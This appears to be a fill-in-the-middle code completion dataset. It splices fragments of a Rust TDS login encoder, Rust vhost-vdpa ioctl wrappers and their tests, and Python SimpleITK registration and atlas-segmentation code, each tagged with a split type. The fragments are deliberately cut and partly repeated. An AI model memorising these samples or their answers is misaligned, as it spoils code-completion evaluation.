/// 0 = The server MUST restrict the collations sent to a specific set of collations.
/// 1 = The server MAY send any collation that fits in the storage space.
const SUPPORT_UNKNOWN_COLL = 0b00001000;
// TODO: fExtension?
}
}
impl FeatureLevel {
pub fn done_row_count_bytes(self) -> u8 {
if self as u8 >= FeatureLevel::SqlServer2005 as u8 {
8
} else {
4
}
}
}
/// the login packet
pub struct LoginMessage<'a> {
/// the highest TDS version the client supports
pub tds_version: FeatureLevel,
/// the requested packet size
pub packet_size: u32,
/// the version of the interface library
pub client_prog_ver: u32,
/// the process id of the client application
pub client_pid: u32,
/// the connection id of the primary server
/// (used when connecting to an "Always UP" backup server)
pub connection_id: u32,
pub option_flags_1: LoginOptionFlags1,
pub option_flags_2: LoginOptionFlags2,
/// flag included in option_flags_2
pub integrated_security: Option<Vec<u8>>,
pub type_flags: LoginTypeFlags,
pub option_flags_3: LoginOptionFlags3,
pub client_timezone: i32,
pub client_lcid: u32,
pub hostname: Cow<'a, str>,
pub username: Cow<'a, str>,
pub password: Cow<'a, str>,
pub app_name: Cow<'a, str>,
pub server_name: Cow<'a, str>,
/// the default database to connect to
pub db_name: Cow<'a, str>,
}
impl<'a> LoginMessage<'a> {
pub fn new() -> LoginMessage<'a> {
LoginMessage {
tds_version: FeatureLevel::SqlServerN,
packet_size: 4096,
client_prog_ver: 0,
client_pid: 0,
connection_id: 0,
option_flags_1: LoginOptionFlags1::USE_DB_NOTIFY | LoginOptionFlags1::INITIAL_DB_FATAL,
option_flags_2: LoginOptionFlags2::INIT_LANG_FATAL | LoginOptionFlags2::ODBC_DRIVER,
integrated_security: None,
type_flags: LoginTypeFlags::empty(),
option_flags_3: LoginOptionFlags3::SUPPORT_UNKNOWN_COLL,
client_timezone: 0, //TODO
client_lcid: 0, // TODO
hostname: "".into(),
username: "".into(),
password: "".into(),
app_name: "".into(),
server_name: "".into(),
db_name: "".into(),
}
}
}
impl<'a> Encode<BytesMut> for LoginMessage<'a> {
fn encode(self, dst: &mut BytesMut) -> crate::Result<()> {
let mut cursor = Cursor::new(Vec::with_capacity(512));
// Space for the length
cursor.write_u32::<LittleEndian>(0)?;
// ignore the specified value for integrated security since we determine that by the struct field
let option_flags2 = if self.integrated_security.is_some() {
self.option_flags_2 | LoginOptionFlags2::INTEGRATED_SECURITY
} else {
self.option_flags_2 & !LoginOptionFlags2::INTEGRATED_SECURITY
};
cursor.write_u32::<LittleEndian>(self.tds_version as u32)?;
cursor.write_u32::<LittleEndian>(self.packet_size)?;
cursor.write_u32::<LittleEndian>(self.client_prog_ver)?;
cursor.write_u32::<LittleEndian>(self.client_pid)?;
cursor.write_u32::<LittleEndian>(self.connection_id)?;
cursor.write_u8(self.option_flags_1.bits())?;
cursor.write_u8(option_flags2.bits())?;
cursor.write_u8(self.type_flags.bits())?;
cursor.write_u8(self.option_flags_3.bits())?;
cursor.write_u32::<LittleEndian>(self.client_timezone as u32)?;
cursor.write_u32::<LittleEndian>(self.client_lcid)?;
// variable length data (OffsetLength)
let var_data = [
&self.hostname,
&self.username,
&self.password,
&self.app_name,
&self.server_name,
&"".into(), // 5. ibExtension
&"".into(), // ibCltIntName
&"".into(), // ibLanguage
&self.db_name,
&"".into(), // 9. ClientId (6 bytes); this is included in var_data so we don't lack the bytes of cbSspiLong (4=2*2) and can insert it at the correct position
&"".into(), // 10. ibSSPI
&"".into(), // ibAtchDBFile
&"".into(), // ibChangePassword
];
let mut data_offset = cursor.position() as usize + var_data.len() * 2 * 2 + 6;
for (i, value) in var_data.iter().enumerate() {
// write the client ID (created from the MAC address)
if i == 9 {
cursor.write_u32::<LittleEndian>(0)?; //TODO:
cursor.write_u16::<LittleEndian>(42)?; //TODO: generate real client id
continue;
}
|
cursor.write_u16::<LittleEndian>(data_offset as u16)?;
|
random_line_split
|
|
vdpa.rs
|
Vdpa {
fd: OpenOptions::new()
.read(true)
.write(true)
.custom_flags(libc::O_CLOEXEC | libc::O_NONBLOCK)
.open(path)
.map_err(Error::VhostOpen)?,
mem,
backend_features_acked: 0,
})
}
}
impl<AS: GuestAddressSpace> VhostVdpa for VhostKernVdpa<AS> {
fn get_device_id(&self) -> Result<u32> {
let mut device_id: u32 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_DEVICE_ID(), &mut device_id) };
ioctl_result(ret, device_id)
}
fn get_status(&self) -> Result<u8> {
let mut status: u8 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_STATUS(), &mut status) };
ioctl_result(ret, status)
}
fn set_status(&self, status: u8) -> Result<()> {
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_STATUS(), &status) };
ioctl_result(ret, ())
}
fn get_config(&self, offset: u32, buffer: &mut [u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
let ret = unsafe {
ioctl_with_ptr(
self,
VHOST_VDPA_GET_CONFIG(),
config.as_mut_fam_struct_ptr(),
)
};
buffer.copy_from_slice(config.as_slice());
ioctl_result(ret, ())
}
fn set_config(&self, offset: u32, buffer: &[u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
config.as_mut_slice().copy_from_slice(buffer);
let ret =
unsafe { ioctl_with_ptr(self, VHOST_VDPA_SET_CONFIG(), config.as_fam_struct_ptr()) };
ioctl_result(ret, ())
}
fn set_vring_enable(&self, queue_index: usize, enabled: bool) -> Result<()> {
let vring_state = vhost_vring_state {
index: queue_index as u32,
num: enabled as u32,
};
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_VRING_ENABLE(), &vring_state) };
ioctl_result(ret, ())
}
fn get_vring_num(&self) -> Result<u16> {
let mut vring_num: u16 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut vring_num) };
ioctl_result(ret, vring_num)
}
fn set_config_call(&self, fd: &EventFd) -> Result<()> {
let event_fd: ::std::os::raw::c_int = fd.as_raw_fd();
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_CONFIG_CALL(), &event_fd) };
ioctl_result(ret, ())
}
fn get_iova_range(&self) -> Result<VhostVdpaIovaRange> {
let mut low_iova_range = vhost_vdpa_iova_range { first: 0, last: 0 };
let ret =
unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_IOVA_RANGE(), &mut low_iova_range) }; // the IOVA range has its own ioctl; VHOST_VDPA_GET_VRING_NUM here was a copy-paste slip
let iova_range = VhostVdpaIovaRange {
first: low_iova_range.first,
last: low_iova_range.last,
};
ioctl_result(ret, iova_range)
}
fn dma_map(&self, iova: u64, size: u64, vaddr: *const u8, readonly: bool) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
userspace_addr: vaddr as u64,
perm: match readonly {
true => VhostAccess::ReadOnly,
false => VhostAccess::ReadWrite,
},
msg_type: VhostIotlbType::Update,
};
self.send_iotlb_msg(&iotlb)
}
fn dma_unmap(&self, iova: u64, size: u64) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
msg_type: VhostIotlbType::Invalidate,
..Default::default()
};
self.send_iotlb_msg(&iotlb)
}
}
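// Illustrative sketch (hypothetical helper, not part of the crate): map a host buffer read-only
// into the device IOVA space via an IOTLB update message and unmap it again afterwards.
fn example_dma_round_trip<AS: GuestAddressSpace>(
    vdpa: &VhostKernVdpa<AS>,
    iova: u64,
    host_ptr: *const u8,
    len: u64,
) -> Result<()> {
    vdpa.dma_map(iova, len, host_ptr, true)?; // readonly == true maps to VhostAccess::ReadOnly
    vdpa.dma_unmap(iova, len)
}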
impl<AS: GuestAddressSpace> VhostKernBackend for VhostKernVdpa<AS> {
type AS = AS;
fn mem(&self) -> &Self::AS {
&self.mem
}
}
impl<AS: GuestAddressSpace> AsRawFd for VhostKernVdpa<AS> {
fn as_raw_fd(&self) -> RawFd {
self.fd.as_raw_fd()
}
}
impl<AS: GuestAddressSpace> VhostKernFeatures for VhostKernVdpa<AS> {
fn
|
(&self) -> u64 {
self.backend_features_acked
}
fn set_backend_features_acked(&mut self, features: u64) {
self.backend_features_acked = features;
}
}
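// Illustrative sketch: acknowledged backend features are cached on the handle so that later
// operations can consult what the device accepted.
fn example_track_acked_features<AS: GuestAddressSpace>(vdpa: &mut VhostKernVdpa<AS>, features: u64) {
    vdpa.set_backend_features_acked(features);
    debug_assert_eq!(vdpa.get_backend_features_acked(), features);
}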
#[cfg(test)]
mod tests {
const VHOST_VDPA_PATH: &str = "/dev/vhost-vdpa-0";
use std::alloc::{alloc, dealloc, Layout};
use vm_memory::{GuestAddress, GuestMemory, GuestMemoryMmap};
use vmm_sys_util::eventfd::EventFd;
use super::*;
use crate::{
VhostBackend, VhostUserDirtyLogRegion, VhostUserMemoryRegionInfo, VringConfigData,
};
use serial_test::serial;
use std::io::ErrorKind;
/// macro to skip test if vhost-vdpa device path is not found.
///
/// vDPA simulators are available since Linux 5.7, but the CI may have
/// an older kernel, so for now we skip the test if we don't find
/// the device.
macro_rules! unwrap_not_found {
( $e:expr ) => {
match $e {
Ok(v) => v,
Err(error) => match error {
Error::VhostOpen(ref e) if e.kind() == ErrorKind::NotFound => {
println!("Err: {:?} SKIPPED", e);
return;
}
e => panic!("Err: {:?}", e),
},
}
};
}
#[test]
#[serial]
fn test_vdpa_kern_new_device() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
assert!(vdpa.as_raw_fd() >= 0);
assert!(vdpa.mem().find_region(GuestAddress(0x100)).is_some());
assert!(vdpa.mem().find_region(GuestAddress(0x10_0000)).is_none());
}
#[test]
#[serial]
fn test_vdpa_kern_is_valid() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let mut config = VringConfigData {
queue_max_size: 32,
queue_size: 32,
flags: 0,
desc_table_addr: 0x1000,
used_ring_addr: 0x2000,
avail_ring_addr: 0x3000,
log_addr: None,
};
assert_eq!(vdpa.is_valid(&config), true);
config.queue_size = 0;
assert_eq!(vdpa.is_valid(&config), false);
config.queue_size = 31;
assert_eq!(vdpa.is_valid(&config), false);
config.queue_size = 33;
assert_eq!(vdpa.is_valid(&config), false);
}
#[test]
#[serial]
fn test_vdpa_kern_ioctls() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let features = vdpa.get_features().unwrap();
// VIRTIO_F_VERSION_1 (bit 32) should be set
assert_ne!(features & (1 << 32),
|
get_backend_features_acked
|
identifier_name
|
vdpa.rs
|
fn set_config(&self, offset: u32, buffer: &[u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
config.as_mut_slice().copy_from_slice(buffer);
let ret =
unsafe { ioctl_with_ptr(self, VHOST_VDPA_SET_CONFIG(), config.as_fam_struct_ptr()) };
ioctl_result(ret, ())
}
fn set_vring_enable(&self, queue_index: usize, enabled: bool) -> Result<()> {
let vring_state = vhost_vring_state {
index: queue_index as u32,
num: enabled as u32,
};
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_VRING_ENABLE(), &vring_state) };
ioctl_result(ret, ())
}
fn get_vring_num(&self) -> Result<u16> {
let mut vring_num: u16 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut vring_num) };
ioctl_result(ret, vring_num)
}
fn set_config_call(&self, fd: &EventFd) -> Result<()> {
let event_fd: ::std::os::raw::c_int = fd.as_raw_fd();
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_CONFIG_CALL(), &event_fd) };
ioctl_result(ret, ())
}
fn get_iova_range(&self) -> Result<VhostVdpaIovaRange> {
let mut low_iova_range = vhost_vdpa_iova_range { first: 0, last: 0 };
let ret =
unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_IOVA_RANGE(), &mut low_iova_range) }; // the IOVA range has its own ioctl; VHOST_VDPA_GET_VRING_NUM here was a copy-paste slip
let iova_range = VhostVdpaIovaRange {
first: low_iova_range.first,
last: low_iova_range.last,
};
ioctl_result(ret, iova_range)
}
fn dma_map(&self, iova: u64, size: u64, vaddr: *const u8, readonly: bool) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
userspace_addr: vaddr as u64,
perm: match readonly {
true => VhostAccess::ReadOnly,
false => VhostAccess::ReadWrite,
},
msg_type: VhostIotlbType::Update,
};
self.send_iotlb_msg(&iotlb)
}
fn dma_unmap(&self, iova: u64, size: u64) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
msg_type: VhostIotlbType::Invalidate,
..Default::default()
};
self.send_iotlb_msg(&iotlb)
}
}
impl<AS: GuestAddressSpace> VhostKernBackend for VhostKernVdpa<AS> {
type AS = AS;
fn mem(&self) -> &Self::AS {
&self.mem
}
}
impl<AS: GuestAddressSpace> AsRawFd for VhostKernVdpa<AS> {
fn as_raw_fd(&self) -> RawFd {
self.fd.as_raw_fd()
}
}
impl<AS: GuestAddressSpace> VhostKernFeatures for VhostKernVdpa<AS> {
fn get_backend_features_acked(&self) -> u64 {
self.backend_features_acked
}
fn set_backend_features_acked(&mut self, features: u64) {
self.backend_features_acked = features;
}
}
#[cfg(test)]
mod tests {
const VHOST_VDPA_PATH: &str = "/dev/vhost-vdpa-0";
use std::alloc::{alloc, dealloc, Layout};
use vm_memory::{GuestAddress, GuestMemory, GuestMemoryMmap};
use vmm_sys_util::eventfd::EventFd;
use super::*;
use crate::{
VhostBackend, VhostUserDirtyLogRegion, VhostUserMemoryRegionInfo, VringConfigData,
};
use serial_test::serial;
use std::io::ErrorKind;
/// macro to skip test if vhost-vdpa device path is not found.
///
/// vDPA simulators are available since Linux 5.7, but the CI may have
/// an older kernel, so for now we skip the test if we don't find
/// the device.
macro_rules! unwrap_not_found {
( $e:expr ) => {
match $e {
Ok(v) => v,
Err(error) => match error {
Error::VhostOpen(ref e) if e.kind() == ErrorKind::NotFound => {
println!("Err: {:?} SKIPPED", e);
return;
}
e => panic!("Err: {:?}", e),
},
}
};
}
#[test]
#[serial]
fn test_vdpa_kern_new_device() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
assert!(vdpa.as_raw_fd() >= 0);
assert!(vdpa.mem().find_region(GuestAddress(0x100)).is_some());
assert!(vdpa.mem().find_region(GuestAddress(0x10_0000)).is_none());
}
#[test]
#[serial]
fn test_vdpa_kern_is_valid() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let mut config = VringConfigData {
queue_max_size: 32,
queue_size: 32,
flags: 0,
desc_table_addr: 0x1000,
used_ring_addr: 0x2000,
avail_ring_addr: 0x3000,
log_addr: None,
};
        assert!(vdpa.is_valid(&config));
        config.queue_size = 0;
        assert!(!vdpa.is_valid(&config));
        config.queue_size = 31;
        assert!(!vdpa.is_valid(&config));
        config.queue_size = 33;
        assert!(!vdpa.is_valid(&config));
}
#[test]
#[serial]
fn test_vdpa_kern_ioctls() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let features = vdpa.get_features().unwrap();
// VIRTIO_F_VERSION_1 (bit 32) should be set
assert_ne!(features & (1 << 32), 0);
vdpa.set_features(features).unwrap();
vdpa.set_owner().unwrap();
vdpa.set_mem_table(&[]).unwrap_err();
let region = VhostUserMemoryRegionInfo {
guest_phys_addr: 0x0,
memory_size: 0x10_0000,
userspace_addr: m.get_host_address(GuestAddress(0x0)).unwrap() as u64,
mmap_offset: 0,
mmap_handle: -1,
};
vdpa.set_mem_table(&[region]).unwrap();
assert!(vdpa.get_device_id().unwrap() > 0);
assert_eq!(vdpa.get_status().unwrap(), 0x0);
vdpa.set_status(0x1).unwrap();
assert_eq!(vdpa.get_status().unwrap(), 0x1);
let mut vec = vec![0u8; 8];
vdpa.get_config(0, &mut vec).unwrap();
vdpa.set_config(0, &vec).unwrap();
let eventfd = EventFd::new(0).unwrap();
// set_log_base() and set_log_fd() are not supported by vhost-vdpa
vdpa.set_log_base(
0x4000,
Some(VhostUserDirtyLogRegion {
mmap_size: 0x1000,
mmap_offset: 0x10,
mmap_handle: 1,
}),
)
.unwrap_err();
vdpa.set_log_base(0x4000, None).unwrap_err();
vdpa.set_log_fd(eventfd.as_raw_fd()).unwrap_err();
let max_queues = vdpa.get_vring_num().unwrap();
vdpa.set_vring_num(0, max_queues + 1).unwrap_err();
vdpa.set_vring_num(0, 32).unwrap();
|
random_line_split
|
||
vdpa.rs
|
Vdpa {
fd: OpenOptions::new()
.read(true)
.write(true)
.custom_flags(libc::O_CLOEXEC | libc::O_NONBLOCK)
.open(path)
.map_err(Error::VhostOpen)?,
mem,
backend_features_acked: 0,
})
}
}
impl<AS: GuestAddressSpace> VhostVdpa for VhostKernVdpa<AS> {
fn get_device_id(&self) -> Result<u32> {
let mut device_id: u32 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_DEVICE_ID(), &mut device_id) };
ioctl_result(ret, device_id)
}
fn get_status(&self) -> Result<u8> {
let mut status: u8 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_STATUS(), &mut status) };
ioctl_result(ret, status)
}
fn set_status(&self, status: u8) -> Result<()> {
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_STATUS(), &status) };
ioctl_result(ret, ())
}
fn get_config(&self, offset: u32, buffer: &mut [u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
let ret = unsafe {
ioctl_with_ptr(
self,
VHOST_VDPA_GET_CONFIG(),
config.as_mut_fam_struct_ptr(),
)
};
buffer.copy_from_slice(config.as_slice());
ioctl_result(ret, ())
}
fn set_config(&self, offset: u32, buffer: &[u8]) -> Result<()> {
let mut config = VhostVdpaConfig::new(buffer.len())
.map_err(|_| Error::IoctlError(IOError::from_raw_os_error(libc::ENOMEM)))?;
config.as_mut_fam_struct().off = offset;
config.as_mut_slice().copy_from_slice(buffer);
let ret =
unsafe { ioctl_with_ptr(self, VHOST_VDPA_SET_CONFIG(), config.as_fam_struct_ptr()) };
ioctl_result(ret, ())
}
fn set_vring_enable(&self, queue_index: usize, enabled: bool) -> Result<()> {
let vring_state = vhost_vring_state {
index: queue_index as u32,
num: enabled as u32,
};
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_VRING_ENABLE(), &vring_state) };
ioctl_result(ret, ())
}
fn get_vring_num(&self) -> Result<u16> {
let mut vring_num: u16 = 0;
let ret = unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_VRING_NUM(), &mut vring_num) };
ioctl_result(ret, vring_num)
}
fn set_config_call(&self, fd: &EventFd) -> Result<()> {
let event_fd: ::std::os::raw::c_int = fd.as_raw_fd();
let ret = unsafe { ioctl_with_ref(self, VHOST_VDPA_SET_CONFIG_CALL(), &event_fd) };
ioctl_result(ret, ())
}
fn get_iova_range(&self) -> Result<VhostVdpaIovaRange> {
let mut low_iova_range = vhost_vdpa_iova_range { first: 0, last: 0 };
let ret =
            unsafe { ioctl_with_mut_ref(self, VHOST_VDPA_GET_IOVA_RANGE(), &mut low_iova_range) };
let iova_range = VhostVdpaIovaRange {
first: low_iova_range.first,
last: low_iova_range.last,
};
ioctl_result(ret, iova_range)
}
fn dma_map(&self, iova: u64, size: u64, vaddr: *const u8, readonly: bool) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
userspace_addr: vaddr as u64,
perm: match readonly {
true => VhostAccess::ReadOnly,
false => VhostAccess::ReadWrite,
},
msg_type: VhostIotlbType::Update,
};
self.send_iotlb_msg(&iotlb)
}
fn dma_unmap(&self, iova: u64, size: u64) -> Result<()> {
let iotlb = VhostIotlbMsg {
iova,
size,
msg_type: VhostIotlbType::Invalidate,
..Default::default()
};
self.send_iotlb_msg(&iotlb)
}
}
impl<AS: GuestAddressSpace> VhostKernBackend for VhostKernVdpa<AS> {
type AS = AS;
fn mem(&self) -> &Self::AS
|
}
impl<AS: GuestAddressSpace> AsRawFd for VhostKernVdpa<AS> {
fn as_raw_fd(&self) -> RawFd {
self.fd.as_raw_fd()
}
}
impl<AS: GuestAddressSpace> VhostKernFeatures for VhostKernVdpa<AS> {
fn get_backend_features_acked(&self) -> u64 {
self.backend_features_acked
}
fn set_backend_features_acked(&mut self, features: u64) {
self.backend_features_acked = features;
}
}
#[cfg(test)]
mod tests {
const VHOST_VDPA_PATH: &str = "/dev/vhost-vdpa-0";
use std::alloc::{alloc, dealloc, Layout};
use vm_memory::{GuestAddress, GuestMemory, GuestMemoryMmap};
use vmm_sys_util::eventfd::EventFd;
use super::*;
use crate::{
VhostBackend, VhostUserDirtyLogRegion, VhostUserMemoryRegionInfo, VringConfigData,
};
use serial_test::serial;
use std::io::ErrorKind;
/// macro to skip test if vhost-vdpa device path is not found.
///
/// vDPA simulators are available since Linux 5.7, but the CI may have
/// an older kernel, so for now we skip the test if we don't find
/// the device.
macro_rules! unwrap_not_found {
( $e:expr ) => {
match $e {
Ok(v) => v,
Err(error) => match error {
Error::VhostOpen(ref e) if e.kind() == ErrorKind::NotFound => {
println!("Err: {:?} SKIPPED", e);
return;
}
e => panic!("Err: {:?}", e),
},
}
};
}
#[test]
#[serial]
fn test_vdpa_kern_new_device() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
assert!(vdpa.as_raw_fd() >= 0);
assert!(vdpa.mem().find_region(GuestAddress(0x100)).is_some());
assert!(vdpa.mem().find_region(GuestAddress(0x10_0000)).is_none());
}
#[test]
#[serial]
fn test_vdpa_kern_is_valid() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let mut config = VringConfigData {
queue_max_size: 32,
queue_size: 32,
flags: 0,
desc_table_addr: 0x1000,
used_ring_addr: 0x2000,
avail_ring_addr: 0x3000,
log_addr: None,
};
        assert!(vdpa.is_valid(&config));
        config.queue_size = 0;
        assert!(!vdpa.is_valid(&config));
        config.queue_size = 31;
        assert!(!vdpa.is_valid(&config));
        config.queue_size = 33;
        assert!(!vdpa.is_valid(&config));
}
#[test]
#[serial]
fn test_vdpa_kern_ioctls() {
let m = GuestMemoryMmap::<()>::from_ranges(&[(GuestAddress(0), 0x10_0000)]).unwrap();
let vdpa = unwrap_not_found!(VhostKernVdpa::new(VHOST_VDPA_PATH, &m));
let features = vdpa.get_features().unwrap();
// VIRTIO_F_VERSION_1 (bit 32) should be set
assert_ne!(features & (1 << 32),
|
{
&self.mem
}
|
identifier_body
|
functions.py
|
Initializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk.Image]
# fixed_mask : The mask of the common image, default is None [sitk.Image]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : The configured 'Demons' registration method [sitk.ImageRegistrationMethod]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk.Image]
# im_mov : The group (moving) image [sitk.Image]
# trafo : The configured registration method [sitk.ImageRegistrationMethod]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# transf : The estimated transformation [sitk.Transform]
def
|
(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
# # MAJORITY VOTING # #
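    # The pairwise intersections collected in this loop are unioned further below
    # over image_list[0..2], so a voxel is kept when at least two of the three
    # atlas masks agree, i.e. a 2-of-3 majority vote (exactly three atlases assumed).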
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
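# Illustrative usage sketch (not part of the original module): the file names and
# the choice of exactly three atlases are hypothetical, and it only feeds
# seg_atlas() the kind of inputs described in the comment block above.
def _example_seg_atlas():
    common_img = sitk.ReadImage("common_ct.nii.gz")
    ct_list = [sitk.ReadImage("group_ct_%d.nii.gz" % i) for i in range(3)]
    seg_list = [sitk.ReadImage("group_mask_%d.nii.gz" % i) for i in range(3)]
    mask_array = seg_atlas(common_img, ct_list, seg_list)
    # Wrap the voxel array back into an image carrying the common image's geometry.
    mask_img = sitk.GetImageFromArray(mask_array)
    mask_img.CopyInformation(common_img)
    return mask_img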
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
